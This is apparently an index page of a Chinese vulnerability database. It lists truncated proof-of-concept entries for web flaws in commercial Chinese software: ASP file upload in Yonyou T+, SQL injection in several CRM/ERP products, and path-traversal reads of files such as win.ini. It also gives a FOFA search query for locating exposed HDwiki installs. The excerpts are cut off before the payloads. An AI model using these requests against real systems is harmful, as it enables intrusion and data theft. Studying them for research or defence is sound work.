- brief introduction
- Table of contents
- Latest documents
ND019 yonyou-chanjet-Upload-uploadfile
可以利用该漏洞上传 asp 脚本 漏洞接口 ``` POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1 Host: caiwu.xazlsec.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko………
myh0st - Oct. 11, 2025, 9:39 a.m.
ND008 wanhu-ezeip-hit-sqli
``` POST /label/ajax/hit.aspx HTTP/1.1 Host: jet-xxxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Connection: close Content-Length: 90 Content-Type:………
myh0st - Sept. 29, 2025, 3:38 p.m.
ND002 renwoxing-crm-SmsDataList-sqli
``` POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1 Host: crm.xazlse.cn User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0………
myh0st - Sept. 29, 2025, 2:46 p.m.
ND010 hjsoft-DisplayExcelCustomReport-fileread
poc ``` POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538………
myh0st - Sept. 16, 2025, 8:24 p.m.
ND001 HDwiki-edition-compare-sqli
漏洞复现 ``` POST /index.php?edition-compare-1 HTTP/1.1 Host: baike.xazlsec.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Connection: close Content-Length………
myh0st - Sept. 16, 2025, 8:12 p.m.
S23 HDwiki
fofa 语句:title="powered by hdwiki!"||body="content=\"hdwiki"||body="http://kaiyuan.hudong.com?hf=hdwiki_copyright_kaiyuan"||header="hd_sid="
myh0st - Sept. 16, 2025, 8:12 p.m.
ND003 fumengyun-index-cookie-sqli
漏洞复现 ``` GET /index.aspx HTTP/1.1 Host: zone.xazlsec.com:99 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15 Connection………
myh0st - Sept. 16, 2025, 7:32 p.m.
ND003 FTYERP-GetSalQuatation-sqli
漏洞接口 ``` POST /AjaxMethods.asmx/GetSalQuatation HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: application/json, text/javascript,………
myh0st - Sept. 16, 2025, 7:31 p.m.
ND001 entesp-oa-getuploadimage-fileread
CVE-2023-47473 企语iFair协同管理系统 getuploadimage 接口存在任意文件读取漏洞 漏洞分析 无 漏洞复现 1、使用 burp 提交如下数据包: GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\\Windows\\win.ini%001.png HTTP/1.1 Host: www Us………
myh0st - Sept. 15, 2025, 10:30 a.m.
ND003 idocview-2word-fileupload
第一步:远程服务器启动 flask 服务, poc ``` from flask import Flask app = Flask(name) @app.route('/index.html') def index(): return """<!DOCTYPE html> title """ @app.route('/..\..\..\docvi………
myh0st - Sept. 11, 2025, 11:12 a.m.